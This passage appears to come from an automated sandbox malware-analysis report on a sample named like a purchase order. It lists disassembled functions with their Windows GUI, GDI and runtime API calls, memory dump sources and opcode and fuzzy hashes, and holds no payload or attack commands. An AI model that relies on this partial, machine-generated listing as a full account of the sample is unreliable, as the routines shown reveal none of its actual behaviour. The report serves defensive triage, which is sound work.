                                                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                            Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                            Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ClearErrorLast
                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                            • API String ID: 2487901850-572801152
                                                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                            Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Enable$Show$MessageSend
                                                            • String ID:
                                                            • API String ID: 1871949834-0
                                                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                            Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                            Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                            • SendMessageW.USER32 ref: 00471AE3
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                            • String ID:
                                                            • API String ID: 3611059338-0
                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                            Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                            • String ID:
                                                            • API String ID: 1640429340-0
                                                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                            Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • _wcslen.LIBCMT ref: 004438CD
                                                            • _wcslen.LIBCMT ref: 004438E6
                                                            • _wcstok.LIBCMT ref: 004438F8
                                                            • _wcslen.LIBCMT ref: 0044390C
                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                            • _wcstok.LIBCMT ref: 00443931
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                            • String ID:
                                                            • API String ID: 3632110297-0
                                                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                            Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 752480666-0
                                                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                            Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                            Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                            • String ID:
                                                            • API String ID: 3275902921-0
                                                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                            Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                            Function 0045559F Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32 ref: 004555C7
                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                            • String ID:
                                                            • API String ID: 3691411573-0
                                                            • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                            • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                            • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                            • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                            Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                            • EndPath.GDI32(?), ref: 004472D6
                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                            • String ID:
                                                            • API String ID: 372113273-0
                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                            Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0044CC6D
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                            Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041708E
                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
